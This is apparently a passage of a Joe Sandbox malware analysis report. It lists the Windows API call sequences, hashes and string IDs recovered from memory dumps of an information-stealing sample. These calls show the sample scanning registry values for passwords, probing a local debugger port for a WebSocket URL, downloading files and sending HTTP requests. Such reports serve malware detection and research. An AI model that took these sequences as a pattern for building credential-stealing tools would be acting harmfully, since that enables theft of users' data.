                                             • Associated: 00000000.00000002.1929017160.00000000006D6000.00000040.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1929017160.00000000006E8000.00000040.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_XJQkTVvJ3I.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Internet$CloseHandleHeapOpen$AllocFileProcessReadmemcpy
                                            • String ID: +aA$+aA
                                            • API String ID: 3894370878-2425922966
                                            • Opcode ID: 2054dbe4896dccbf1b25db0542e201d3eadf361b24acad6cfbdf1ee3c924dd12
                                            • Instruction ID: fde31ff110f26a7c533ed41685ed538a2d60c52cc522202a3453e975d8f44226
                                            • Opcode Fuzzy Hash: 2054dbe4896dccbf1b25db0542e201d3eadf361b24acad6cfbdf1ee3c924dd12
                                            • Instruction Fuzzy Hash: 193136B4E01218ABDB20CF54DC85BDDB7B5EB48304F1081EAFA09A7281D7746AC18F9D
                                            APIs
                                              • Part of subcall function 0246AD17: lstrcpy.KERNEL32(?,00000000), ref: 0246AD5D
                                              • Part of subcall function 02454A67: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 02454AA1
                                              • Part of subcall function 02454A67: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 02454AB8
                                              • Part of subcall function 02454A67: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 02454ACF
                                              • Part of subcall function 02454A67: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 02454AF0
                                              • Part of subcall function 02454A67: InternetCrackUrlA.WININET(00000000,00000000), ref: 02454B00
                                              • Part of subcall function 0246ACB7: lstrcpy.KERNEL32(00420E1A,00000000), ref: 0246ACFF
                                            • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 02454BCC
                                            • StrCmpCA.SHLWAPI(?,006D6E80), ref: 02454BF1
                                            • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 02454D71
                                            • lstrlen.KERNEL32(00000000,00000000,?,?,?,?,00420DDE,00000000,?,?,00000000,?,00421AB8,00000000,?,006D6F14), ref: 0245509F
                                            • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 024550BB
                                            • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 024550CF
                                            • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 02455100
                                            • InternetCloseHandle.WININET(00000000), ref: 02455164
                                            • InternetCloseHandle.WININET(00000000), ref: 0245517C
                                            • HttpOpenRequestA.WININET(00000000,006D6E9C,?,006D6CB4,00000000,00000000,00400100,00000000), ref: 02454DCC
                                              • Part of subcall function 0246AF27: lstrlen.KERNEL32(?,006D6BF0,?,004250E4,00420E1A), ref: 0246AF3C
                                              • Part of subcall function 0246AF27: lstrcpy.KERNEL32(00000000), ref: 0246AF7B
                                              • Part of subcall function 0246AF27: lstrcat.KERNEL32(00000000,00000000), ref: 0246AF89
                                              • Part of subcall function 0246AE17: lstrcpy.KERNEL32(?,00420E1A), ref: 0246AE7C
                                              • Part of subcall function 0246AE97: lstrcpy.KERNEL32(00000000,?), ref: 0246AEE9
                                              • Part of subcall function 0246AE97: lstrcat.KERNEL32(00000000), ref: 0246AEF9
                                            • InternetCloseHandle.WININET(00000000), ref: 02455186
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929625361.0000000002450000.00000040.00001000.00020000.00000000.sdmp, Offset: 02450000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2450000_XJQkTVvJ3I.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Internet$lstrcpy$lstrlen$??2@CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
                                            • String ID:
                                            • API String ID: 2402878923-0
                                            • Opcode ID: 4915cdb8ce48543cbc412707aa7bde3cd0b43d09323a8e95c40c05a4a77eff2b
                                            • Instruction ID: d4e72ab636aea64e07c42ea81957ffae3da91ea5f14503e2321c6f84575ee302
                                            • Opcode Fuzzy Hash: 4915cdb8ce48543cbc412707aa7bde3cd0b43d09323a8e95c40c05a4a77eff2b
                                            • Instruction Fuzzy Hash: 9F121F72941628AACB19EBA1DC59FFEB73AAF14701F50419EE14672090EF306F48CF52
                                            APIs
                                              • Part of subcall function 0246AD17: lstrcpy.KERNEL32(?,00000000), ref: 0246AD5D
                                              • Part of subcall function 02454A67: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 02454AA1
                                              • Part of subcall function 02454A67: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 02454AB8
                                              • Part of subcall function 02454A67: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 02454ACF
                                              • Part of subcall function 02454A67: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 02454AF0
                                              • Part of subcall function 02454A67: InternetCrackUrlA.WININET(00000000,00000000), ref: 02454B00
                                              • Part of subcall function 0246ACB7: lstrcpy.KERNEL32(00420E1A,00000000), ref: 0246ACFF
                                            • InternetOpenA.WININET(00420DFF,00000001,00000000,00000000,00000000), ref: 02456598
                                            • StrCmpCA.SHLWAPI(?,006D6E80), ref: 024565BA
                                            • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 024565EC
                                            • HttpOpenRequestA.WININET(00000000,00421B58,?,006D6CB4,00000000,00000000,00400100,00000000), ref: 0245663C
                                            • InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 02456676
                                            • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 02456688
                                            • HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 024566B4
                                            • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 02456724
                                            • InternetCloseHandle.WININET(00000000), ref: 024567A6
                                            • InternetCloseHandle.WININET(00000000), ref: 024567B0
                                            • InternetCloseHandle.WININET(00000000), ref: 024567BA
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929625361.0000000002450000.00000040.00001000.00020000.00000000.sdmp, Offset: 02450000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2450000_XJQkTVvJ3I.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Internet$??2@CloseHandleHttp$OpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
                                            • String ID:
                                            • API String ID: 3074848878-0
                                            • Opcode ID: ac41d8ecf663f4ee37a4d0cdec011a5d743951c9ad13516bf48e5d7933a9a4d1
                                            • Instruction ID: d22bc73f4399d038ccfd1d9808fc0aa5420b70640e5b95538633dc5917d019a9
                                            • Opcode Fuzzy Hash: ac41d8ecf663f4ee37a4d0cdec011a5d743951c9ad13516bf48e5d7933a9a4d1
                                            • Instruction Fuzzy Hash: 30713171A00628EBDB24DFA0DC48FEEB77AEF44701F50419AE50A6B190DBB56A84CF51
                                            APIs
                                            • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 02469463
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929625361.0000000002450000.00000040.00001000.00020000.00000000.sdmp, Offset: 02450000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2450000_XJQkTVvJ3I.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: CreateGlobalStream
                                            • String ID:
                                            • API String ID: 2244384528-0
                                            • Opcode ID: 68c812a46f952ba48fa7337b2ce4f4d30c6e31e532046c2242e001230db6a87b
                                            • Instruction ID: b2140660ef03a57af2120ad5b82f589a485cfb47e3c705a2ddd05d56c361d0e2
                                            • Opcode Fuzzy Hash: 68c812a46f952ba48fa7337b2ce4f4d30c6e31e532046c2242e001230db6a87b
                                            • Instruction Fuzzy Hash: E171FB75E05248ABDB04EFE4DC88FEEB77ABF48700F10854AF515A7290EB74A904CB61
                                            APIs
                                              • Part of subcall function 02459CB7: InternetOpenA.WININET(00420AF6,00000001,00000000,00000000,00000000), ref: 02459CD1
                                            • memset.MSVCRT ref: 02459E9A
                                            • lstrcat.KERNEL32(?,004212A8), ref: 02459EAF
                                            • lstrcat.KERNEL32(?,00000000), ref: 02459EC5
                                            • memset.MSVCRT ref: 02459F01
                                            • lstrcat.KERNEL32(?,004212BC), ref: 02459F16
                                            • lstrcat.KERNEL32(?,004212C4), ref: 02459F28
                                            • lstrcat.KERNEL32(?,?), ref: 02459F3C
                                            • lstrcat.KERNEL32(?,004212C8), ref: 02459F4E
                                            • lstrcat.KERNEL32(?,?), ref: 02459F62
                                            • lstrcat.KERNEL32(?,004212CC), ref: 02459F74
                                            • lstrlen.KERNEL32(00000000), ref: 02459F7E
                                            • lstrlen.KERNEL32(00000000), ref: 02459F8D
                                              • Part of subcall function 0246ACB7: lstrcpy.KERNEL32(00420E1A,00000000), ref: 0246ACFF
                                            • memset.MSVCRT ref: 02459FE5
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929625361.0000000002450000.00000040.00001000.00020000.00000000.sdmp, Offset: 02450000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2450000_XJQkTVvJ3I.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: lstrcat$memset$lstrlen$InternetOpenlstrcpy
                                            • String ID:
                                            • API String ID: 689835475-0
                                            • Opcode ID: e67822385d328e2dce11951795e88f3921dfec35951474a789e8be3019acb687
                                            • Instruction ID: d9d9d6efbca5829148f53922f535555f175851b0ebf5625456c16b69271fbced
                                            • Opcode Fuzzy Hash: e67822385d328e2dce11951795e88f3921dfec35951474a789e8be3019acb687
                                            • Instruction Fuzzy Hash: 91516E71D00628ABCB14EBE0DC59FEE7739BF14302F80459EE506A6190EF759684CF61
                                            APIs
                                            • InternetOpenA.WININET(00420AF6,00000001,00000000,00000000,00000000), ref: 00409A6A
                                            • InternetOpenUrlA.WININET(00000000,http://localhost:9229/json,00000000,00000000,80000000,00000000), ref: 00409AAB
                                            • InternetCloseHandle.WININET(00000000), ref: 00409AC7
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929017160.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1929017160.000000000053D000.00000040.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1929017160.0000000000549000.00000040.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1929017160.000000000056E000.00000040.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1929017160.00000000006D6000.00000040.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1929017160.00000000006E8000.00000040.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_XJQkTVvJ3I.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Internet$Open$CloseHandle
                                            • String ID: "webSocketDebuggerUrl":$"ws://$http://localhost:9229/json
                                            • API String ID: 3289985339-2144369209
                                            • Opcode ID: 170f34314a9a50de4dc5ee84ba35aa8bb061ee5a30c9fc0fe8f8ec154b18fd50
                                            • Instruction ID: 65c64d5f42ab2d525f7f9866baa54bb10b69c20dcdde589055b7f2aa2564e8b2
                                            • Opcode Fuzzy Hash: 170f34314a9a50de4dc5ee84ba35aa8bb061ee5a30c9fc0fe8f8ec154b18fd50
                                            • Instruction Fuzzy Hash: C0414B35A10258EBCB14EB90DC85FDD7774BB48340F1041AAF505BA191DBB8AEC0CF68
                                            APIs
                                              • Part of subcall function 00407330: memset.MSVCRT ref: 00407374
                                              • Part of subcall function 00407330: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,00407CF0), ref: 0040739A
                                              • Part of subcall function 00407330: RegEnumValueA.ADVAPI32(00407CF0,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 00407411
                                              • Part of subcall function 00407330: StrStrA.SHLWAPI(00000000,Password,00000000), ref: 0040746D
                                              • Part of subcall function 00407330: GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,00407CF0,80000001,00416414,?,?,?,?,?,00407CF0,?), ref: 004074B2
                                              • Part of subcall function 00407330: HeapFree.KERNEL32(00000000,?,?,?,?,00407CF0,80000001,00416414,?,?,?,?,?,00407CF0,?), ref: 004074B9
                                            • lstrcatA.KERNEL32(00000000,0042192C,00407CF0,80000001,00416414,?,?,?,?,?,00407CF0,?,?,00416414), ref: 00407666
                                            • lstrcatA.KERNEL32(00000000,00000000,00000000), ref: 004076A8
                                            • lstrcatA.KERNEL32(00000000, : ), ref: 004076BA
                                            • lstrcatA.KERNEL32(00000000,00000000,00000000,00000000), ref: 004076EF
                                            • lstrcatA.KERNEL32(00000000,00421934), ref: 00407700
                                            • lstrcatA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00407733
                                            • lstrcatA.KERNEL32(00000000,00421938), ref: 0040774D
                                            • task.LIBCPMTD ref: 0040775B
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929017160.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1929017160.000000000053D000.00000040.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1929017160.0000000000549000.00000040.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1929017160.000000000056E000.00000040.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1929017160.00000000006D6000.00000040.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1929017160.00000000006E8000.00000040.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_XJQkTVvJ3I.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: lstrcat$Heap$EnumFreeOpenProcessValuememsettask
                                            • String ID: :
                                            • API String ID: 3191641157-3653984579
                                            • Opcode ID: b3130cf40c1dd3c7cf9147a5f31127e01731d4f473a6a07740fc976ddd9062c8
                                            • Instruction ID: 7dd5c8f6c25e89eb5421da9b581f9cff4d94f04832d352fdfe902425259828cd
                                            • Opcode Fuzzy Hash: b3130cf40c1dd3c7cf9147a5f31127e01731d4f473a6a07740fc976ddd9062c8
                                            • Instruction Fuzzy Hash: B73164B1E05114DBDB04EBA0DD55DFE737AAF48305B50411EF102772E0DA38AA85CB96
                                            APIs
                                            • lstrcpy.KERNEL32(?,?), ref: 02461892
                                              • Part of subcall function 024691D7: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 02469202
                                              • Part of subcall function 02469657: StrStrA.SHLWAPI(\nm,00000000,00000000,?,0245A1D8,00000000,006D6E5C,00000000), ref: 02469663
                                            • lstrcpy.KERNEL32(?,00000000), ref: 024618CE
                                              • Part of subcall function 02469657: lstrcpyn.KERNEL32(006D7580,\nm,\nm,?,0245A1D8,00000000,006D6E5C), ref: 02469687
                                              • Part of subcall function 02469657: lstrlen.KERNEL32(00000000,?,0245A1D8,00000000,006D6E5C), ref: 0246969E
                                              • Part of subcall function 02469657: wsprintfA.USER32 ref: 024696BE
                                            • lstrcpy.KERNEL32(?,00000000), ref: 02461916
                                            • lstrcpy.KERNEL32(?,00000000), ref: 0246195E
                                            • lstrcpy.KERNEL32(?,00000000), ref: 024619A5
                                            • lstrcpy.KERNEL32(?,00000000), ref: 024619ED
                                            • lstrcpy.KERNEL32(?,00000000), ref: 02461A35
                                            • lstrcpy.KERNEL32(?,00000000), ref: 02461A7C
                                            • lstrcpy.KERNEL32(?,00000000), ref: 02461AC4
                                              • Part of subcall function 0246AD97: lstrlen.KERNEL32(024551BC,?,?,024551BC,00420DDF), ref: 0246ADA2
                                              • Part of subcall function 0246AD97: lstrcpy.KERNEL32(00420DDF,00000000), ref: 0246ADFC
                                            • strtok_s.MSVCRT ref: 02461C07
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929625361.0000000002450000.00000040.00001000.00020000.00000000.sdmp, Offset: 02450000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2450000_XJQkTVvJ3I.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: lstrcpy$lstrlen$FolderPathlstrcpynstrtok_swsprintf
                                            • String ID:
                                            • API String ID: 4276352425-0
                                            • Opcode ID: da86a3651816fd612d9f19635d2e19fbb626f2ddea617614ccf9717b4b52eb80
                                            • Instruction ID: 39ece96ee1db59deeb3f89394c6d738774d8ad46f93c9b6195d644e20e1fb093
                                            • Opcode Fuzzy Hash: da86a3651816fd612d9f19635d2e19fbb626f2ddea617614ccf9717b4b52eb80
                                            • Instruction Fuzzy Hash: 157167B2D01218ABCB15EB61DC8CEFE777AAF54300F04459FE509A2140EE759B88CF62
                                            APIs
                                            • memset.MSVCRT ref: 00407374
                                            • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,00407CF0), ref: 0040739A
                                            • RegEnumValueA.ADVAPI32(00407CF0,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 00407411
                                            • StrStrA.SHLWAPI(00000000,Password,00000000), ref: 0040746D
                                            • GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,00407CF0,80000001,00416414,?,?,?,?,?,00407CF0,?), ref: 004074B2
                                            • HeapFree.KERNEL32(00000000,?,?,?,?,00407CF0,80000001,00416414,?,?,?,?,?,00407CF0,?), ref: 004074B9
                                              • Part of subcall function 00409290: vsprintf_s.MSVCRT ref: 004092AB
                                            • task.LIBCPMTD ref: 004075B5
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929017160.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1929017160.000000000053D000.00000040.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1929017160.0000000000549000.00000040.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1929017160.000000000056E000.00000040.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1929017160.00000000006D6000.00000040.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1929017160.00000000006E8000.00000040.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_XJQkTVvJ3I.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Heap$EnumFreeOpenProcessValuememsettaskvsprintf_s
                                            • String ID: Password
                                            • API String ID: 2698061284-3434357891
                                            • Opcode ID: 3a3dd591c7cbb0d90e152054b3ac75d8c6492caf44e892e450b93b3cf6805213
                                            • Instruction ID: 394e2b55a83f95d9b644045a39dee7934e13af239b1baa97d0343fed5997f3db
                                            • Opcode Fuzzy Hash: 3a3dd591c7cbb0d90e152054b3ac75d8c6492caf44e892e450b93b3cf6805213
                                            • Instruction Fuzzy Hash: 43611EB5D041689BDB24DB50CC41BDAB7B8BF54304F0081EAE649A6181EF746FC9CF95
                                            APIs
                                            • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 02467939
                                            • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 02467976
                                            • GetProcessHeap.KERNEL32(00000000,00000104), ref: 024679FA
                                            • RtlAllocateHeap.NTDLL(00000000), ref: 02467A01
                                            • wsprintfA.USER32 ref: 02467A37
                                              • Part of subcall function 0246ACB7: lstrcpy.KERNEL32(00420E1A,00000000), ref: 0246ACFF
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929625361.0000000002450000.00000040.00001000.00020000.00000000.sdmp, Offset: 02450000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2450000_XJQkTVvJ3I.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowslstrcpywsprintf
                                            • String ID: :$C$\
                                            • API String ID: 1544550907-3809124531
                                            • Opcode ID: 39db56893d369c74f5f4f3db1860a6a0fb8aa9103e681a18a70390936e9ddc23
                                            • Instruction ID: a52983bcc70933fcff7083321af89792be10164f3f1b59b3d8bf5dfe33f99666
                                            • Opcode Fuzzy Hash: 39db56893d369c74f5f4f3db1860a6a0fb8aa9103e681a18a70390936e9ddc23
                                            • Instruction Fuzzy Hash: B24185B1D05258ABDB10DF94CC84BEEBBB5EF08704F00419AF50567280D7756B84CFA6
                                            APIs
                                            • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,009D03A8,00000000,?,00420E14,00000000,?,00000000), ref: 004182C0
                                            • HeapAlloc.KERNEL32(00000000,?,?,?,?,00000000,00000000,?,009D03A8,00000000,?,00420E14,00000000,?,00000000,00000000), ref: 004182C7
                                            • GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 004182E8
                                            • __aulldiv.LIBCMT ref: 00418302
                                            • __aulldiv.LIBCMT ref: 00418310
                                            • wsprintfA.USER32 ref: 0041833C
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929017160.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1929017160.000000000053D000.00000040.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1929017160.0000000000549000.00000040.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1929017160.000000000056E000.00000040.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1929017160.00000000006D6000.00000040.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1929017160.00000000006E8000.00000040.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_XJQkTVvJ3I.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Heap__aulldiv$AllocGlobalMemoryProcessStatuswsprintf
                                            • String ID: %d MB$@
                                            • API String ID: 2886426298-3474575989
                                            • Opcode ID: d0391a1658ec30498705cc8c9cee2c4097af9c2ce960180bd43284ebda5957a4
                                            • Instruction ID: 389ef6515a1f2427be64b00d9458de7be2b91b0079cd17c5d853587b1d371e56
                                            • Opcode Fuzzy Hash: d0391a1658ec30498705cc8c9cee2c4097af9c2ce960180bd43284ebda5957a4
                                            • Instruction Fuzzy Hash: 8B214AF1E44218ABDB00DFD5DD49FAEBBB9FB44B04F10450AF615BB280D77969008BA9
                                            APIs
                                            • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,006D6D60,00000000,?,00420E14,00000000,?,00000000), ref: 02468527
                                            • RtlAllocateHeap.NTDLL(00000000), ref: 0246852E
                                            • GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 0246854F
                                            • __aulldiv.LIBCMT ref: 02468569
                                            • __aulldiv.LIBCMT ref: 02468577
                                            • wsprintfA.USER32 ref: 024685A3
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929625361.0000000002450000.00000040.00001000.00020000.00000000.sdmp, Offset: 02450000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2450000_XJQkTVvJ3I.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Heap__aulldiv$AllocateGlobalMemoryProcessStatuswsprintf
                                            • String ID: @$pkm
                                            • API String ID: 2774356765-1350193380
                                            • Opcode ID: d0391a1658ec30498705cc8c9cee2c4097af9c2ce960180bd43284ebda5957a4
                                            • Instruction ID: 7b25dac20d49e1c3466bb52f1e816ff6ab5f396408969a84448686ed5d49e786
                                            • Opcode Fuzzy Hash: d0391a1658ec30498705cc8c9cee2c4097af9c2ce960180bd43284ebda5957a4
                                            • Instruction Fuzzy Hash: F1214DB1E44358ABDB00DBD5CC49FBEBBB9FB44B04F10450AF615BB280D77859048BA6
                                            APIs
                                              • Part of subcall function 0041AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0041AAF6
                                              • Part of subcall function 00404800: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 0040483A
                                              • Part of subcall function 00404800: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404851
                                              • Part of subcall function 00404800: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404868
                                              • Part of subcall function 00404800: lstrlenA.KERNEL32(00000000,00000000,0000003C), ref: 00404889
                                              • Part of subcall function 00404800: InternetCrackUrlA.WININET(00000000,00000000), ref: 00404899
                                            • InternetOpenA.WININET(00420DFB,00000001,00000000,00000000,00000000), ref: 0040615F
                                            • StrCmpCA.SHLWAPI(?,009D1ED0), ref: 00406197
                                            • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 004061DF
                                            • CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 00406203
                                            • InternetReadFile.WININET(00412DB1,?,00000400,?), ref: 0040622C
                                            • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 0040625A
                                            • CloseHandle.KERNEL32(?,?,00000400), ref: 00406299
                                            • InternetCloseHandle.WININET(00412DB1), ref: 004062A3
                                            • InternetCloseHandle.WININET(00000000), ref: 004062B0
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929017160.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1929017160.000000000053D000.00000040.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1929017160.0000000000549000.00000040.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1929017160.000000000056E000.00000040.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1929017160.00000000006D6000.00000040.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1929017160.00000000006E8000.00000040.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_XJQkTVvJ3I.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Internet$??2@CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
                                            • String ID:
                                            • API String ID: 4287319946-0
                                            • Opcode ID: 79bb47fcace65dc0c408726790117bb2adccae202de1a5eabfd6db97336226ad
                                            • Instruction ID: 62bae03b9e4771e022f65dfe0b744ca25a6527e7e90d195df508867c32b8ef77
                                            • Opcode Fuzzy Hash: 79bb47fcace65dc0c408726790117bb2adccae202de1a5eabfd6db97336226ad
                                            • Instruction Fuzzy Hash: CD5184B1A01218ABDB20EF90DC45FEE7779AB44305F0041AEF605B71C0DB786A95CF59
                                            APIs
                                              • Part of subcall function 0246AD17: lstrcpy.KERNEL32(?,00000000), ref: 0246AD5D
                                              • Part of subcall function 02454A67: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 02454AA1
                                              • Part of subcall function 02454A67: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 02454AB8
                                              • Part of subcall function 02454A67: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 02454ACF
                                              • Part of subcall function 02454A67: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 02454AF0
                                              • Part of subcall function 02454A67: InternetCrackUrlA.WININET(00000000,00000000), ref: 02454B00
                                            • InternetOpenA.WININET(00420DFB,00000001,00000000,00000000,00000000), ref: 024563C6
                                            • StrCmpCA.SHLWAPI(?,006D6E80), ref: 024563FE
                                            • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 02456446
                                            • CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 0245646A
                                            • InternetReadFile.WININET(?,?,00000400,?), ref: 02456493
                                            • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 024564C1
                                            • CloseHandle.KERNEL32(?,?,00000400), ref: 02456500
                                            • InternetCloseHandle.WININET(?), ref: 0245650A
                                            • InternetCloseHandle.WININET(00000000), ref: 02456517
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929625361.0000000002450000.00000040.00001000.00020000.00000000.sdmp, Offset: 02450000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2450000_XJQkTVvJ3I.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Internet$??2@CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
                                            • String ID:
                                            • API String ID: 4287319946-0
                                            • Opcode ID: b1da7730cf3e973672ea3d958da0836ae58ce978cfb0a793029a7ab8af6d853d
                                            • Instruction ID: a1a32b8b75431e687ebd2886bb4ca9faeaff4ca489103ba2a0a183ed80a40263
                                            • Opcode Fuzzy Hash: b1da7730cf3e973672ea3d958da0836ae58ce978cfb0a793029a7ab8af6d853d
                                            • Instruction Fuzzy Hash: F05194B1A00228ABDB24DF50DC48BEE777AAB44305F40819AEA45A71C1DB74AA85CF95
                                            APIs
                                            • memset.MSVCRT ref: 0246523E
                                              • Part of subcall function 024691D7: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 02469202
                                            • lstrcat.KERNEL32(?,00000000), ref: 02465267
                                            • lstrcat.KERNEL32(?,00420FE8), ref: 02465284
                                              • Part of subcall function 02464DC7: wsprintfA.USER32 ref: 02464DE3
                                              • Part of subcall function 02464DC7: FindFirstFileA.KERNEL32(?,?), ref: 02464DFA
                                            • memset.MSVCRT ref: 024652CA
                                            • lstrcat.KERNEL32(?,00000000), ref: 024652F3
                                            • lstrcat.KERNEL32(?,00421008), ref: 02465310
                                              • Part of subcall function 02464DC7: StrCmpCA.SHLWAPI(?,00420FC4), ref: 02464E28
                                              • Part of subcall function 02464DC7: StrCmpCA.SHLWAPI(?,00420FC8), ref: 02464E3E
